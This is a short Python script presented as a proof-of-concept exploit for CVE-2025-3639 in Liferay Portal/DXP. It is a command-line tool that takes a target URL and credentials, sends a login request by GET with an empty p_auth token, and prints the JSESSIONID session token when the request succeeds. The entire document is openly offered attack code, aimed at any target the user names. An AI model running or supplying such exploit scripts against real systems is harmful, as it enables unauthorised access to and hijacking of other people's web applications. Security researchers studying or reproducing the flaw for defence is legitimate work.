import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)